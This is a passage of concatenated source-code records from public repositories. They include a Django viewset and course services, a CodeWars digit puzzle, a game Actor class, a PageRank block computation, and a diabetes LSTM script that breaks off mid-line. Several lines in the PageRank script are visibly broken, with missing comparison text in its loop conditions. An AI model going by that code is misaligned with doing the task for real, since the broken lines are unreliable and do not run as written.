PeriodicTaskDefaultSerializer\n\n\nclass TaskResultFilter(filters.FilterSet):\n module = filters.CharFilter(method=\"get_module\")\n\n class Meta:\n model = TaskResult\n fields = ['id', 'task_name', 'status', 'result']\n\n def get_module(self, queryset, name, value):\n if value:\n return queryset.filter(accounts__mobile_payment_applies=True)\n return queryset\n\n\nclass TaskResultViewSet(ModelViewSet):\n queryset = TaskResult.objects.all()\n serializer_class = TaskResultDefaultSerializer\n filter_backends = [DjangoFilterBackend, SearchFilter]\n filterset_class = TaskResultFilter\n search_fields = ['id', 'task_name', 'status']\n\n def paginate_queryset(self, queryset):\n \"\"\"\n Return a single page of results, or `None` if pagination is disabled.\n \"\"\"\n not_paginator = self.request.query_params.get('not_paginator', None)\n\n if not_paginator:\n return None\n return self.paginator.paginate_queryset(queryset, self.request, view=self)\n\n @action(methods=['GET'], detail=False)\n def field_options(self, request):\n field = self.request.query_params.get('field', None)\n fields = self.request.query_params.getlist('fields', None)\n if fields:\n try:\n data = {}\n for field in fields:\n data[field] = []\n for c in TaskResult._meta.get_field(field).choices:\n data[field].append({\n \"value\": c[0],\n \"description\": c[1]\n })\n return Response(data, status=status.HTTP_200_OK)\n except ValueError as e:\n return Response(e, status=status.HTTP_400_BAD_REQUEST)\n elif field:\n try:\n choices = []\n for c in TaskResult._meta.get_field(field).choices:\n choices.append({\n \"value\": c[0],\n \"description\": c[1]\n })\n return Response(choices, status=status.HTTP_200_OK)\n except ValueError as e:\n return Response(e, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"the field parameter is mandatory\"}, status=status.HTTP_400_BAD_REQUEST)\n\n","repo_name":"YAVILES/rc871_backend","sub_path":"apps/system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73652121124","text":"# You have to create a function that takes a positive integer number and returns the next bigger number formed by the same digits:\n\ndef next_bigger(n):\n\n digits = [int(x) for x in str(n)]\n \n for x in range(len(digits)-1, 0, -1):\n if digits[x] > digits[x-1]:\n slice = [digits[x-1]] + sorted(digits[x:])\n digits[x-1:] = []\n \n for i in range(len(slice)-1):\n if slice[0] < slice[i+1]:\n slice[0], slice[i+1] = slice[i+1], slice[0]\n digits.append(slice[0])\n slice.pop(0)\n digits += sorted(slice)\n break\n \n return int(''.join([str(i) for i in digits]))\n return -1\n","repo_name":"andreicosmind/CodeWars","sub_path":"Next_bigger_number_with_the_same_digits.py","file_name":"Next_bigger_number_with_the_same_digits.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7748156238","text":"import json\n\n\nclass Title:\n \"\"\"\n The DTO class parses a \"3_Title\" element object from a DataHub general instance.\n \"\"\"\n\n def __init__(self, title: str):\n self.title: str = title\n\n @classmethod\n def create_from_dict(cls, element: dict):\n title = element[\"title\"][\"@value\"]\n\n return cls(title)\n\n @classmethod\n def create_from_mock_result(cls, mock_json=None):\n if mock_json is None:\n mock_json = cls.MOCK_JSON\n return Title.create_from_dict(json.loads(mock_json))\n\n MOCK_JSON = \"\"\"\n {\n \"@context\": {\n \"title\": \"https://schema.metadatacenter.org/properties/4ffd7c46-1df8-4885-ade4-50d542d5b81e\"\n },\n \"title\": {\n \"@value\": \"Mock title - Test\"\n }\n }\n \"\"\"\n","repo_name":"MaastrichtUniversity/cedar-parsing-utils","sub_path":"cedarparsingutils/dto/general_elements/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30193900818","text":"from constants import *\n\n# ___ _ _ _ \n# / _ \\| |__ (_) ___ ___| |_ ___ \n#| | | | '_ \\| |/ _ \\/ __| __/ __|\n#| |_| | |_) | | __/ (__| |_\\__ \\\n# \\___/|_.__// |\\___|\\___|\\__|___/\n# |__/ \n\nclass Actor:\n\t'''Interactable object in the game'''\n\tdef __init__(self, x, y, name, sprite, creature=None, ai=None):\n self.x = x #map address, not pixel address\n self.y = y\n self.sprite = sprite\n\n #components\n self.creature = creature # player.creature would reference the creature component\n if creature:\n creature.owner = self # the creature blongs the Actor that called it\n \n self.ai = ai\n if ai:\n ai.owner = self\n\n\n\tdef draw(self, DISPLAYSURF):\n '''Draw actor on the main surface'''\n DISPLAYSURF.blit(self.sprite, (self.x*CELL_WIDTH, self.y*CELL_HEIGHT))\n\n\tdef move(self, dx, dy, game_map):\n #check if path is blocked before moving\n if game_map[self.x + dx][self.y + dy].block_path == False:\n self.x += dx\n self.y += dy\n","repo_name":"Daniel4125/python_roguelike","sub_path":"objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25422881848","text":"from datetime import datetime, timedelta, date\nfrom typing import Dict, BinaryIO\n\nimport requests\nfrom django.db import transaction\nfrom django.db.models import Q, Sum, When, Case, IntegerField, F\nfrom django.utils import timezone\nfrom django.core.exceptions import ValidationError\n\nfrom odin.users.models import BaseUser\n\nfrom .models import (\n Course,\n CourseAssignment,\n CourseDescription,\n Student,\n Teacher,\n Week,\n IncludedMaterial,\n Material,\n IncludedTask,\n Task,\n ProgrammingLanguage,\n Solution,\n Test,\n IncludedTest,\n StudentNote,\n Lecture,\n SolutionComment,\n)\n\n\ndef add_student(course: Course, student: Student) -> CourseAssignment:\n return CourseAssignment.objects.create(course=course, student=student)\n\n\ndef add_teacher(course: Course, teacher: Teacher, hidden: bool=False) -> CourseAssignment:\n return CourseAssignment.objects.create(course=course, teacher=teacher, hidden=hidden)\n\n\n@transaction.atomic\ndef create_course(\n *,\n name: str,\n start_date: datetime,\n end_date: datetime,\n repository: str,\n facebook_group: str=None,\n video_channel: str=None,\n slug_url: str=None,\n logo: BinaryIO=None,\n public: bool=True,\n attendable: bool=True,\n description: str=\"\"\n) -> Course:\n\n if Course.objects.filter(name=name).exists():\n raise ValidationError('Course already exists')\n\n course = Course.objects.create(\n name=name,\n start_date=start_date,\n end_date=end_date,\n repository=repository,\n facebook_group=facebook_group,\n video_channel=video_channel,\n slug_url=slug_url,\n logo=logo,\n public=public\n )\n\n weeks = course.duration_in_weeks\n start_date = course.start_date - timedelta(days=start_date.weekday())\n\n week_instances = []\n for i in range(1, weeks + 1):\n current = Week(\n course=course,\n number=i,\n start_date=start_date,\n end_date=start_date + timedelta(days=6)\n )\n\n start_date = current.end_date + timedelta(days=1)\n week_instances.append(current)\n\n Week.objects.bulk_create(week_instances)\n CourseDescription.objects.create(course=course, verbose=description)\n\n return course\n\n\ndef create_included_material(\n *,\n course: Course,\n week: Week,\n identifier: str=None,\n url: str=None,\n content: str=None,\n existing_material: Material=None\n) -> IncludedMaterial:\n\n included_material = IncludedMaterial(week=week, course=course)\n\n if existing_material is None:\n existing_material = Material(identifier=identifier, url=url, content=content)\n existing_material.full_clean()\n existing_material.save()\n\n included_material.identifier = existing_material.identifier\n included_material.url = existing_material.url\n included_material.content = existing_material.content\n\n included_material.material = existing_material\n included_material.full_clean()\n included_material.save()\n\n return included_material\n\n\ndef create_included_task(\n *,\n course: Course,\n week: Week,\n name: str=None,\n description: str=None,\n gradable: bool=False,\n existing_task: Task=None,\n)-> IncludedTask:\n\n included_task = IncludedTask(week=week, course=course)\n if existing_task is None:\n existing_task = Task(name=name, description=description, gradable=gradable)\n existing_task.full_clean()\n existing_task.save()\n\n included_task.name = existing_task.name\n included_task.description = existing_task.description\n included_task.gradable = existing_task.gradable\n\n included_task.task = existing_task\n included_task.full_clean()\n included_task.save()\n\n return included_task\n\n\ndef create_test_for_task(\n *,\n existing_test: Test=None,\n task: IncludedTask,\n language: ProgrammingLanguage,\n extra_options: Dict={},\n code: str=None,\n requirements: str=None,\n file: BinaryIO=None\n):\n\n new_test = IncludedTest(task=task)\n if existing_test is None:\n existing_test = Test(\n language=language,\n extra_options=extra_options,\n code=code,\n requirements=requirements,\n file=file\n )\n existing_test.full_clean()\n existing_test.save()\n\n new_test.language = existing_test.language\n new_test.extra_options = existing_test.extra_options\n new_test.code = existing_test.code\n new_test.requirements = existing_test.requirements\n new_test.file = existing_test.file\n\n new_test.test = existing_test\n new_test.save()\n\n return new_test\n\n\ndef create_gradable_solution(\n *,\n task: IncludedTask,\n user: BaseUser,\n code: str=None,\n file: BinaryIO=None\n) -> Solution:\n\n if code is not None and file is not None:\n raise ValidationError(\"Provide either code or a file, not both!\")\n if code is None and file is None:\n raise ValidationError(\"Provide either code or a file!\")\n if code is not None:\n new_solution = Solution.objects.create(\n task=task,\n user=user,\n code=code,\n status=6\n )\n if file is not None:\n new_solution = Solution.objects.create(\n task=task,\n user=user,\n file=file,\n status=6\n )\n\n return new_solution\n\n\ndef create_non_gradable_solution(\n *,\n task: IncludedTask,\n user: BaseUser,\n url: str=None\n) -> Solution:\n\n if url is None:\n raise ValidationError(\"Provide a url!\")\n new_solution = Solution.objects.create(\n task=task,\n user=user,\n url=url,\n status=6\n )\n\n return new_solution\n\n\ndef calculate_student_valid_solutions_for_course(\n *,\n user: BaseUser,\n course: Course\n) -> str:\n\n total_tasks = IncludedTask.objects.filter(course=course).count()\n if not total_tasks:\n return 0\n solved_tasks = Solution.objects.get_solved_solutions_for_student_and_course(user, course).count()\n\n ratio = (solved_tasks/total_tasks) * 100\n return f'{ratio:.1f}'\n\n\ndef get_all_student_solution_statistics(\n *,\n task: IncludedTask\n) -> Dict:\n\n result = {}\n course = task.course\n result['total_student_count'] = course.students.count()\n\n filters = {'solutions__task': task, 'solutions__isnull': False}\n result['students_with_a_submitted_solution_count'] = course.students.filter(**filters).distinct().count()\n q_expression = Q(solutions__task__gradable=True, solutions__status=Solution.OK) \\\n | Q(solutions__task__gradable=False, solutions__status=Solution.SUBMITTED_WITHOUT_GRADING)\n result['students_with_a_passing_solution_count'] = course.students.filter(\n q_expression, solutions__task=task\n ).distinct().count()\n\n return result\n\n\ndef create_student_note(\n *,\n author: Teacher,\n assignment: CourseAssignment,\n text: str\n) -> StudentNote:\n\n note = StudentNote(\n author=author,\n assignment=assignment,\n text=text\n )\n\n note.full_clean()\n note.save()\n\n return note\n\n\ndef create_lecture(\n *,\n date: date,\n course: Course\n) -> Lecture:\n\n week_qs = Week.objects.filter(start_date__lte=date, end_date__gte=date, course=course)\n if week_qs.exists():\n lecture = Lecture(date=date, course=course, week=week_qs.first())\n lecture.full_clean()\n lecture.save()\n\n return lecture\n else:\n raise ValidationError('Date not in range of any week for this course')\n\n\ndef add_week_to_course(\n *,\n course: Course,\n new_end_date: timezone.datetime.date\n) -> Week:\n\n last_week = course.weeks.last()\n new_week = Week.objects.create(\n course=course,\n number=last_week.number + 1,\n start_date=course.end_date,\n end_date=new_end_date\n )\n\n course.end_date = course.end_date + timezone.timedelta(days=7)\n course.save()\n\n return new_week\n\n\ndef create_solution_comment(\n *,\n solution: Solution,\n user: BaseUser,\n text: str\n) -> SolutionComment:\n\n comment = SolutionComment(\n solution=solution,\n user=user,\n text=text\n )\n\n comment.full_clean()\n comment.save()\n\n return comment\n\n\ndef get_gradable_tasks_for_course(\n *,\n course: Course,\n user: BaseUser\n):\n\n tasks = []\n\n for task in course.included_tasks.order_by('week__number', 'task__id'):\n if task.gradable:\n task.last_solution = get_last_solution_for_task(\n task=task,\n user=user\n )\n tasks.append(task)\n\n return tasks\n\n\ndef get_last_solution_for_task(\n *,\n task: IncludedTask,\n user: BaseUser\n) -> Solution:\n\n return Solution.objects.filter(task=task, user=user).order_by('-id').first()\n\n\ndef create_included_task_with_test(\n *,\n course: Course,\n language: ProgrammingLanguage,\n week: Week,\n name: str,\n code: str,\n requirements: str=None,\n gradable: bool,\n description_url: str\n):\n\n if not description_url.endswith('README.md'):\n description_url = description_url.replace('tree', 'blob')\n description_url = f'{description_url}/README.md'\n\n description_url = f'{description_url}?raw=1'\n\n markdown = requests.get(description_url, timeout=2).text\n\n included_task = create_included_task(\n course=course,\n week=week,\n name=name,\n description=markdown,\n gradable=gradable\n )\n included_task.save()\n\n if included_task.gradable:\n\n included_test = create_test_for_task(\n task=included_task,\n code=code,\n language=language,\n requirements=requirements\n )\n\n included_test.save()\n\n return included_task\n\n\ndef get_user_solution_summary(\n user: BaseUser\n):\n\n results = Solution.objects.aggregate(\n OK=Sum(\n Case(\n When(Q(status__in=['2']) & Q(user=user), then=1),\n output_field=IntegerField()\n )\n ),\n TOTAL=Sum(\n Case(\n When(Q(status__range=(0, 6)) & Q(user=user), then=1),\n output_field=IntegerField()\n )\n )\n )\n\n completed_tasks = user.solutions.filter(status=2).annotate(\n name=F('task__name'),\n task_id=F('task'),\n solution_id=F('id'),\n solution_code=F('code'),\n test_result=F('test_output')\n ).values('name', 'task_id', 'solution_code', 'test_result', 'solution_id')\n\n results['completed_tasks'] = completed_tasks\n\n return results\n\n\ndef get_user_avatar_url(\n user: BaseUser\n):\n\n if not user.profile.full_image:\n return None\n\n return str(user.profile.full_image.url)\n","repo_name":"prabhatpankaj/Odin","sub_path":"odin/education/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":10722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"780666184","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 9 09:16:37 2020\n分块计算PR,归一化\n@author: wangrui\n\"\"\"\n\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport os, csv, networkx as nx\nimport time\nimport pandas as pd\n\nmin_error=0.0001\nmax_iter=1000\n\ndef parse(filename): # 解析csv\n# reader = csv.reader(open(filename, 'r'), delimiter=',')\n DG = nx.DiGraph()\n csv_reader = csv.reader(open(filename,encoding = 'utf-8'))\n font_weight = tuple(csv_reader)\n DG.add_weighted_edges_from(font_weight)\n return DG\n\nclass PageRank:\n def __init__(self, graph):\n# def __init__(self):\n self.graph = graph\n# self.V = len(self.graph) # 一共多少施引文献\n self.d = 0.2 # 阻尼系数\n# self.ranks = dict() # 存储迭代结果\n \n def rank(self):\n# for key in self.graph.nodes:\n# self.ranks[key] = 0.0 # 初始化所有节点的rank值都是0\n N_nodes = len(self.graph.nodes)\n print(N_nodes)\n graph_list = list(self.graph.nodes) # 元素是节点id\n N = 1 # 定义矩阵的块数\n one_fourthNum = N_nodes//N \n print('划分节点:'+str(one_fourthNum))\n # 读取分块\n now = time.time()\n last_time = now\n last_block_time = now\n # 求行和\n sum_l = np.zeros(N_nodes,dtype = 'float32')\n print('开始求行和',)\n start_sum_time = time.time()\n sum_time = time.time()\n for num_sum in range(N):\n print('>>>>>>'+str(num_sum))\n if num_sum = one_fourthNum*num_sum and graph_list.index(node) < one_fourthNum*(num_sum+1):\n # 如果出链节点id在当前分块矩阵列索引范围内,则添加对应权重\n cur[graph_list.index(key), graph_list.index(node)-one_fourthNum*num_sum] = weight['weight']\n else: # 涉及到非整除,最后一个单独处理\n cur = np.zeros((N_nodes,N_nodes-one_fourthNum*(N-1)),dtype='float32')\n for key, node, weight in self.graph.edges(data=True):\n if graph_list.index(node) >= one_fourthNum*(N-1):\n cur[graph_list.index(key), graph_list.index(node)-one_fourthNum*(N-1)] = weight['weight']\n sum_l += cur.sum(axis=1)\n del cur\n end_sum_time = time.time()\n print('当前分块耗时 {} s:'.format(end_sum_time-start_sum_time))\n start_sum_time = end_sum_time\n print('<<<<<<')\n print('行和已求完,用时 {} s'.format(time.time()-sum_time))\n# sum_l = pd.read_csv('norm1_sum.csv')['sum'].values\n # 初始化向量\n# x0 = np.zeros(N_nodes,dtype='float32')\n# for xnum in range(len(x0)):\n# x0[xnum] = 1000/N_nodes\n x0 = pd.read_csv('PR0_0.0001_1000_1-d_0.55.csv')['PR'].values\n print('迭代开始前,x0中0的个数 {} 个'.format(np.sum(x0==0)))\n #开始迭代\n for j in range(max_iter):\n print('开始第 {} 轮迭代!'.format(j))\n x_next = [] # 初始化x_next\n for i in range(N):\n if i = one_fourthNum*i and graph_list.index(node) < one_fourthNum*(i+1):\n # 如果出链节点id在当前分块矩阵列索引范围内,则添加对应权重\n cur[graph_list.index(key), graph_list.index(node)-one_fourthNum*i] = weight['weight']\n else: # 涉及到非整除,最后一个单独处理\n cur = np.zeros((N_nodes,N_nodes-one_fourthNum*(N-1)),dtype='float32')\n for key, node, weight in self.graph.edges(data=True):\n if graph_list.index(node) >= one_fourthNum*(N-1):\n cur[graph_list.index(key), graph_list.index(node)-one_fourthNum*(N-1)] = weight['weight']\n # 归一化\n for k in range(N_nodes):\n if sum_l[k]>0:\n cur[k, :] /= sum_l[k] # L\n else:\n cur[k, :] = 1 / N_nodes\n print(cur)\n cur_block_time = time.time()\n print(\"当前分块消耗total time {} s\".format(cur_block_time-last_block_time))\n last_block_time = cur_block_time\n # 每次分块矩阵求当前分块的PR值\n x_cur = self.d * np.dot(x0, cur) + (1.0 - self.d)*1000 / x0.shape[0]\n del cur # 释放内存\n print(x_cur.shape)\n for each in x_cur:\n x_next.append(each)\n print(np.array(x_next).shape)\n x_next = np.array(x_next).reshape(-1)\n print(str(j)+'次迭代,PR向量为0的元素有:'+str(np.sum(x_next==0)))\n error = sum(abs(x_next - x0))\n with open('error0_1000_0.0001_1-d_0.8.txt', 'a',encoding = 'utf-8') as f:\n f.write(str(error)+'\\n')\n print(\"当前迭代误差 {} \".format(error))\n x0 = x_next\n cur_time = time.time()\n print(\"当前消耗total time {} s\".format(cur_time-last_time))\n last_time = cur_time\n if error < min_error:\n break\n print(sum(x0))\n return x0,graph_list\n\nif __name__ == '__main__':\n time_start = time.time()\n filename = \"./NORM1Net_single05_19.csv\"\n graph = parse(filename)\n p = PageRank(graph)\n A = p.rank()\n df = pd.DataFrame()\n df['key'] = A[1]\n df['PR'] = A[0]\n df.to_csv('./PR0_0.0001_1000_1-d_0.8.csv',encoding = 'utf-8') # 存储结果\n\n time_end = time.time()\n print(\"total time {} s\".format(time_end-time_start))\n\n","repo_name":"Lishjie/evaluate_academic_papers_and_groups_new_methods","sub_path":"calculate CPI/block_PR_ours_NORM0.py","file_name":"block_PR_ours_NORM0.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40786720183","text":"import pandas as pd\nimport numpy as np\nimport sys\nfrom scipy.stats import ttest_ind\nfrom sklearn.metrics import confusion_matrix,roc_auc_score,average_precision_score,classification_report,f1_score\nimport random\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport torch\nimport torchvision\nimport torch.nn as nn # All neural network modules, nn.Linear, nn.Conv2d, BatchNorm, Loss functions\nimport torch.optim as optim # For all Optimization algorithms, SGD, Adam, etc.\nimport torch.nn.functional as F # All functions that don't have any parameters\nimport copy\nfrom torch.nn import init\nimport math\nimport argparse\nfrom scipy import stats\nimport matplotlib.pyplot as plt \nimport seaborn as sns \nfrom sklearn.preprocessing import StandardScaler, QuantileTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tqdm import tqdm\n\nnp.set_printoptions(precision=3)\ntorch.manual_seed(0)\nnp.random.seed(42)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--hidden_size\", type=int, default=200)\n parser.add_argument(\"--num_layers\", type=int, default=3)\n parser.add_argument(\"--num_epochs\", type=int, default=5) \n parser.add_argument(\"--batch_size\", type=int, default=16)\n parser.add_argument(\"--learning_rate\", type=float, default=0.00001) \n parser.add_argument(\"--end\", type=int,help='IA cutoff', default=24) \n parser.add_argument(\"--serial\", type=int,help='gene exp cutoff', default=16) \n parser.add_argument(\"--device\", type=str,default='cuda') \n parser.add_argument(\"--option\", type=int,help='0 for combined data, 6 for only gene exp',default=0) \n parser.add_argument(\"--demo\", type=bool,default=False) \n parser.add_argument(\"--HLA\", type=bool,default=False) \n parser.add_argument(\"--history\", type=bool,default=False) \n parser.add_argument(\"--imputed_data_dir\", type=str,help='save directory for imputation.py',default='/home/tanvir/Diabetes/data/imputed_data/') \n parser.add_argument(\"--processed_data_dir\", type=str,help='save directory for data_processing.py',default='/home/tanvir/Diabetes/data/processed_data/') \n parser.add_argument(\"--raw_data_dir\", type=str,help='directory of raw omics data',default='/home/tanvir/Diabetes/data/raw_data/') \n args = parser.parse_args()\n print(args)\n\nimputed_data_dir = args.imputed_data_dir\nprocessed_data_dir = args.processed_data_dir\nraw_data_dir = args.raw_data_dir\ndevice = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\n\ndef persistent_pos(data,mask_id,end):\n new_id = []\n for temp in mask_id:\n y = data[data[\"MaskID\"].isin([temp])]\n y = y.drop_duplicates(subset=['SAMPLE_COLLECTION_VISIT'], keep='first')\n y = y.sort_values(by=['SAMPLE_COLLECTION_VISIT'])\n xy,x_ind,y_ind = np.intersect1d(np.arange(3,end+1,3),y.loc[:,\"SAMPLE_COLLECTION_VISIT\"].values,return_indices=True) \n y = y.iloc[y_ind,:]\n #y = np.sort(y[y[\"OUTCOME\"].isin([\"b'Pos'\"])].loc[:,'SAMPLE_COLLECTION_VISIT'])\n y = y.loc[:,'OUTCOME'].values\n y[y==\"b'Neg'\"]=0\n y[y==\"b'Pos'\"]=1\n\n if np.size(y)>1:\n y = np.convolve(y,np.ones(2,dtype=int),'valid')\n if 2 in y:\n new_id.append(temp)\n\n return new_id\n \n\ndef find_thr(predictions,target):\n best_score=0\n grid = np.arange(0.35,0.95,0.001)\n for thr in grid:\n predictions_b = np.where(predictions>=thr,1,0)\n #score = f1_score(target,predictions_b)\n tn, fp, fn, tp = confusion_matrix(target, predictions_b).ravel()\n score = (tp/(tp+fn))+(tn/(tn+fp))\n\n if score>best_score:\n best_score = score\n best_thr = thr\n\n return best_thr\n\n\ndef validation(epoch, loader, model):\n \n # Set model to eval\n model.eval()\n predictions=[]\n target=[]\n with torch.no_grad():\n for x, y in loader:\n \n x = x.to(device) \n scores = model(x)\n\n predictions.append(scores.cpu().detach().numpy().ravel().ravel())\n target.append(y.numpy().ravel())\n\n predictions = np.squeeze(predictions,0)\n target = np.squeeze(target,0)\n threshold = find_thr(predictions,target)\n predictions_b = np.where(predictions>=threshold,1,0)\n tn, fp, fn, tp = confusion_matrix(target, predictions_b).ravel()\n\n return tp/(tp+fn), threshold\n\ndef check_accuracy(epoch, loader, model, threshold):\n \n # Set model to eval\n model.eval()\n predictions=[]\n target=[]\n with torch.no_grad():\n for x, y in loader:\n \n x = x.to(device) \n scores = model(x)\n\n predictions.append(scores.cpu().detach().numpy().ravel().ravel())\n target.append(y.numpy().ravel())\n\n predictions = np.squeeze(predictions,0)\n target = np.squeeze(target,0)\n predictions_b = np.where(predictions>=threshold,1,0)\n tn, fp, fn, tp = confusion_matrix(target, predictions_b).ravel()\n\n return roc_auc_score(target, predictions),average_precision_score(target, predictions), f1_score(target, predictions_b),\\\n tn/(tn+fp), tp/(tp+fn),tp/(tp+fp) , classification_report(target, predictions_b)\n\n\ndef masking(input_data,mask):\n new_data = np.zeros((np.shape(input_data)))\n\n for row in range(np.size(mask,0)):\n for column in range(np.size(mask,1)):\n if mask[row,column]==0:\n new_data[row,column,:] = input_data[row,column,:]\n input_data[row,column,:]=0\n\n input_data = new_data.astype(np.float32)\n return input_data\n\n\nclass RNN_LSTM(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers, num_classes):\n super(RNN_LSTM, self).__init__()\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True)\n self.fc = nn.Linear(hidden_size, num_classes)\n self.act = nn.Sigmoid()\n\n def forward(self, x):\n # Set initial hidden and cell states\n h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)\n c0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)\n\n # Forward propagate LSTM\n out, _ = self.lstm(x, (h0, c0)) \n\n # Decode the hidden state of the last time step\n out = self.fc(out[:,-1,:])\n out = self.act(out)\n\n return out\n\n\n\ninput_data = np.load(imputed_data_dir+'comb_gene_gan.npy') #large_cohort\nfeature_name = pd.read_csv(processed_data_dir+'feature_name.csv',header=None)\nfeature_name = feature_name.values\nsample_name = pd.read_csv(processed_data_dir+'sample_name.csv',header=None) \nniddk_id = sample_name.values.ravel()\n\nvar = np.var(input_data, axis=0)\nvar = np.mean(var,axis=0)\nfeat = np.argsort(var)[::-1]\n\nmask = pd.read_csv(processed_data_dir+'mask.csv',header=None,delimiter=',')\ninput_data = masking(input_data,mask.values)\n\n'''\nfor i in range(16):\n temp = input_data[:,i,:]\n scaler = QuantileTransformer(n_quantiles=4, random_state=0)#.fit(train.transpose()) #StandardScaler()\n temp = scaler.fit_transform(temp.transpose())\n input_data[:,i,:] = temp.transpose()\n'''\n\n\nclinical_data = pd.read_csv(raw_data_dir+'test_results.csv',index_col=0)\nclinical_data = clinical_data[['TEST_NAME','RESULT','OUTCOME','SAMPLE_COLLECTION_VISIT','MaskID']]\nclinical_data = clinical_data[clinical_data[\"OUTCOME\"].isin([\"b'Neg'\",\"b'Pos'\"])] \nclinical_data = clinical_data[clinical_data[\"MaskID\"].isin(niddk_id)] \n\ntotal_pp = []\nfor IA in [\"b'GAD'\",\"b'IA2A'\",\"b'MIAA'\",\"b'ZnT8A'\"]:\n clinical_data1 = clinical_data[clinical_data[\"TEST_NAME\"].isin([IA])]\n pp = persistent_pos(clinical_data1,niddk_id,args.end)\n total_pp.extend(pp)\n \nPP = np.unique(total_pp)\n\ny = np.zeros((np.shape(input_data)[0],1)).astype(np.float32)\nfor ind, i in enumerate(niddk_id):\n if i in PP:\n y[ind]=1\n\n####\n\nsnp = pd.read_csv(raw_data_dir+'small_sparse_matrix.csv',header=None,delimiter=' ') # #sparse.load_npz('/data/tahmed/Diabetes/snp_to_gene/gan/snp.npz') #\nsnp_data = snp.values.transpose()\nsnp_sample_name = pd.read_csv(raw_data_dir+'phs001037.v2.pht005918.v1.p1.TEDDY_Sample.MULTI.txt',\n skiprows=10,delimiter='\\t',usecols=[3])\n\nlink = pd.read_sas(raw_data_dir+'snp_dbgap_link.sas7bdat')\nxy,x_ind,y_ind = np.intersect1d(snp_sample_name,link.iloc[:,1],return_indices=True)\nsnp_sample_name = link.iloc[y_ind,0]\n\nif args.history is True:\n hist = pd.read_sas(raw_data_dir+'family_history.sas7bdat')\n hist1 = hist.filter(regex='^SIBLINGDIABETIC',axis=1)\n hist2 = hist.loc[:,['MOTHERDIABETIC','FATHERDIABETIC','MaskID']]\n hist = pd.concat((hist1,hist2),axis=1)\n\n snp_sample_name,x_ind,y_ind = np.intersect1d(snp_sample_name,hist.MaskID,return_indices=True)\n snp_data = snp_data[x_ind]\n hist = hist.iloc[y_ind,:]\n ID = []\n for col in hist.columns:\n hist_1 = hist.loc[hist[col].astype(str) == \"b'Yes'\"]\n ID.extend(hist_1.MaskID)\n\n fh = np.zeros((np.size(hist.MaskID),1)).astype(np.float32)\n for e,i in enumerate(hist.MaskID):\n if i in ID:\n fh[e]=1\n\n subset = [2,7,8,9]\n snp_data = snp_data[:,subset]\n fh = np.concatenate((fh,snp_data),axis=1)\n\nelse:\n subset = [2,7,8,9]\n fh = snp_data[:,subset]\n \n\nif args.HLA is True:\n HLA = pd.read_csv('/home/tanvir/Diabetes/HLA.csv',header=None)\n snp_sample_name,x_ind,y_ind = np.intersect1d(HLA.iloc[:,0],snp_sample_name,return_indices=True)\n HLA_data = HLA.iloc[x_ind,[1]]\n fh = fh[y_ind,:]\n fh = np.concatenate((fh,HLA_data),axis=1)\n\nniddk_id,x_ind,y_ind = np.intersect1d(niddk_id,snp_sample_name,return_indices=True)\ninput_data = input_data[x_ind,:,:]\ny = y[x_ind] \nfh = fh[y_ind,:]\n\nif args.demo is True:\n\n ### add demography\n demo = pd.read_csv('/home/tanvir/Diabetes/TEDDY_V20/TEDDY_DATA/screening_form.csv',usecols=[3,11,22,23,24,25,26,27,35])\n demo = demo.set_index(['MaskID'])\n gender = demo.iloc[:,1].astype(str)\n gender[gender==\"b'Female'\"] = 0\n gender[gender==\"b'Male'\"] = 1\n #gender[gender=='nan'] = 0\n\n ethnicity = demo.iloc[:,[0,2,3,4,5,6,7]].astype(str)\n ethnicity[ethnicity== \"b'No'\"] = 0\n ethnicity[ethnicity== \"b'Yes'\"] = 1\n ethnicity[ethnicity=='nan'] = 0\n ethnicity[ethnicity==\"b'Unknown or not reported'\"] = 0\n ethnicity = ethnicity.drop(['RACE_UNKNOWNORNOTREPORTED'],axis=1)\n\n demography = ethnicity# pd.concat((gender,ethnicity),axis=1,ignore_index=False)\n xy,x_ind,y_ind = np.intersect1d(niddk_id,demography.index,return_indices=True)\n input_data = input_data[x_ind,:]\n fh = fh[x_ind,:]\n y = y[x_ind]\n demography = demography.iloc[y_ind].values.astype(float)\n\n fh = np.concatenate((fh,demography),axis=1)\n\nfh = np.expand_dims(fh,1)\nfh = np.repeat(fh,16,1) \n\ninput_data = input_data[:,:,feat[0:30]]\ninput_data = np.concatenate([fh,input_data],2).astype(np.float32)\ninput_data = input_data[:,0:args.serial,:]\n\nprint(np.unique(y,return_counts=True))\n\n####\nsample_size = np.size(y)\nhidden_size = args.hidden_size\nnum_layers = args.num_layers\nnum_classes = 1\nlearning_rate = args.learning_rate\nnum_epochs = args.num_epochs\nbatch_size = args.batch_size\n\nfor feat in range(15,16):\n AUC=[]\n AUCPR=[]\n F1=[]\n SENSITIVITY=[]\n SPECIFICITY=[]\n PRECISION=[]\n for i in tqdm(range(40,90)):\n ind = np.arange(np.size(y))\n random.seed(i)\n random.shuffle(ind) \n train_idx = ind[0:math.floor(np.size(y)*.6)]\n val_idx = 